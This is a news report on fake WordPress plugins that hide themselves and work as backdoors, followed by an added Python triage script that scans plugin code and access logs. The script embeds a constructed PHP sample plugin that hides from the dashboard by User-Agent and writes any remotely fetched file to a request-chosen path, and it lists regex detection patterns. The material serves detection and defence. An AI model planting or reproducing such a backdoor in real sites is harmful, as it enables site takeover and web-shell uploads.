Malicious actors are using fake WordPress plugins with backdoor capabilities that hide in plain sight to compromise sites, maintain access to them, and upload web shells and scripts for brute-forcing other sites. Researchers at Sucuri have spotted several such plugins (with names such as initiatorseo and updrat123) that copy the structure of the popular backup/restore plugin UpdraftPlus, which has more than 2 million active installations and is regularly updated by its contributors.
“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” the researchers said.
The malicious plugins hide themselves from the WordPress dashboard: they are listed only for visitors whose browser sends a specific User-Agent string, and that string varies from plugin to plugin. Such plugins can easily be created with ready-made automated tools, or by inserting malicious payloads such as web shells into the source code of legitimate plugins.
According to Sucuri, a fake plugin will also reveal its presence when the attackers add a specific GET parameter to a request, such as initiationactivity or testingkey. The main purpose of these plugins is to serve as a backdoor that lets the attackers upload web shells into various directories of the compromised site; the shells carry a script for brute-forcing other websites, which tests lists of username/password pairs against targeted WordPress sites.
To upload arbitrary files to a compromised site, the attackers send POST requests that specify the remote URL from which the file should be downloaded, along with the path and name of the file to be created on the compromised server. The names of these POST parameters differ for each analysed plugin, the researchers found.
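The behaviours described above (self-hiding keyed on the User-Agent, a GET switch that reveals the plugin, and a POST-driven download-and-write backdoor) can be turned into triage heuristics. The following Python script is an added example, not Sucuri's tooling and not code from any real plugin: it scans a plugin's main file for those code patterns, flags a plugin header whose Text Domain does not match the directory it is installed under (the UpdraftPlus 1.16.16 metadata inside initiatorseo is that case), and goes one step beyond the article by also checking web server access logs for the trigger parameters and for POST requests sent straight to a plugin file. The regexes, thresholds, the sample plugin sources and the log lines are all constructed for illustration; only the GET parameter names initiationactivity and testingkey come from the article, while the POST parameter names src and dst and the User-Agent token Example-Agent are assumptions.

```python
"""Heuristic triage for fake WordPress plugins of the kind described above.
Added example, not Sucuri's tooling or any real plugin's code: regexes,
thresholds, sample plugin sources and log lines are constructed. Only the GET
parameter names come from the article; src, dst and the UA token are assumed."""
import re
from urllib.parse import parse_qs, urlsplit

# Code-level indicators. Each alone is weak (legitimate plugins filter
# 'all_plugins' too); the combination is what warrants a closer look.
CODE_INDICATORS = {
    # removes its own entry from the Plugins screen
    "hides_plugin_entry": re.compile(r"add_filter\(\s*['\"](all_plugins|pre_current_active_plugins)['\"]"),
    "user_agent_gate": re.compile(r"HTTP_USER_AGENT"),
    # a GET parameter that switches behaviour (the 'announce yourself' knob)
    "get_switch": re.compile(r"\$_GET\s*\[\s*['\"][A-Za-z0-9_]+['\"]\s*\]"),
    # fetches a URL taken from the request, then writes to a path taken from the request
    "remote_fetch": re.compile(r"(file_get_contents|curl_setopt|fopen)\s*\([^;]*\$_(POST|REQUEST|GET)"),
    "arbitrary_write": re.compile(r"(file_put_contents|fwrite|move_uploaded_file)\s*\([^;]*\$_(POST|REQUEST|GET)"),
}
# WordPress reads the plugin header from the first 8 KB of the main file.
HEADER_RE = re.compile(r"^[ \t/*#]*(Plugin Name|Version|Text Domain)\s*:\s*(.+?)\s*$", re.M)


def plugin_header(source):
    return dict(HEADER_RE.findall(source[:8192]))


def scan_plugin(slug, source):
    """Indicators that fire for one plugin's main file, plus a verdict."""
    hits = {name for name, rx in CODE_INDICATORS.items() if rx.search(source)}
    text_domain = plugin_header(source).get("Text Domain", "")
    # Header copied from another plugin but installed under a different slug,
    # like the UpdraftPlus 1.16.16 metadata found inside 'initiatorseo'.
    if text_domain and text_domain.lower() != slug.lower():
        hits.add("header_slug_mismatch")
    if {"remote_fetch", "arbitrary_write"} <= hits or len(hits) >= 3:
        verdict = "suspicious"
    else:
        verdict = "review" if hits else "clean"
    return {"hits": sorted(hits), "verdict": verdict}


# Access-log side: the GET switch and direct POSTs to a plugin file show up in
# web server logs even when the plugin is invisible in the dashboard.
TRIGGER_PARAMS = {"initiationactivity", "testingkey"}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" \d{3}')


def suspicious_requests(log_lines):
    """Flag lines carrying a known trigger parameter or a POST straight to a plugin file."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        triggers = set(parse_qs(url.query, keep_blank_values=True)) & TRIGGER_PARAMS
        reasons = []
        if triggers:
            reasons.append("trigger-param:" + ",".join(sorted(triggers)))
        if m.group("method") == "POST" and url.path.startswith("/wp-content/plugins/") and url.path.endswith(".php"):
            reasons.append("direct-post-to-plugin-file")
        if reasons:
            flagged.append({"ip": m.group("ip"), "target": m.group("target"), "reasons": reasons})
    return flagged


# Constructed samples (not real plugin code). The fake one mirrors the behaviour
# the article describes; the parameter names and User-Agent token are invented.
FAKE_PLUGIN = """<?php
/*
Plugin Name: UpdraftPlus - Backup/Restore
Version: 1.16.16
Text Domain: updraftplus
*/
add_filter('all_plugins', function ($plugins) {
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'Example-Agent') === false) {
        unset($plugins['initiatorseo/initiatorseo.php']);
    }
    return $plugins;
});
if (isset($_GET['initiationactivity'])) { echo 'present'; }
if (isset($_POST['src'], $_POST['dst'])) {
    file_put_contents(ABSPATH . $_POST['dst'], file_get_contents($_POST['src']));
}
"""
BENIGN_PLUGIN = """<?php
/*
Plugin Name: Example Widget
Version: 0.1
Text Domain: example-widget
*/
add_action('init', function () { register_post_type('ex_widget', ['public' => true]); });
"""
SAMPLE_LOG = [  # constructed, using documentation IP ranges
    '203.0.113.10 - - [01/Oct/2019:10:00:00 +0000] "GET /?initiationactivity=1 HTTP/1.1" 200 512',
    '203.0.113.10 - - [01/Oct/2019:10:00:05 +0000] "POST /wp-content/plugins/initiatorseo/initiatorseo.php HTTP/1.1" 200 12',
    '198.51.100.7 - - [01/Oct/2019:10:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Oct/2019:10:01:02 +0000] "GET /?p=12 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print("initiatorseo:", scan_plugin("initiatorseo", FAKE_PLUGIN))
    print("example-widget:", scan_plugin("example-widget", BENIGN_PLUGIN))
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Run it against a real install by feeding each `wp-content/plugins/<slug>/<slug>.php` to `scan_plugin` with its directory name as the slug, and the access log to `suspicious_requests`. The verdict is a triage aid, not proof: a backup plugin legitimately fetches remote files, so a "suspicious" result means read the code, and a "clean" result does not exclude a backdoor that lives outside the plugin directory, which is the point the researchers make below.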
“While none of the approaches used by this attack are new, it clearly demonstrates how cleaning only the visible parts of an infection is not enough. Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface,” the researchers concluded. They also noted that compromised websites may be used as a platform for attacks that are invisible from the outside, such as DDoS and brute-force attacks, spam or cryptomining operations.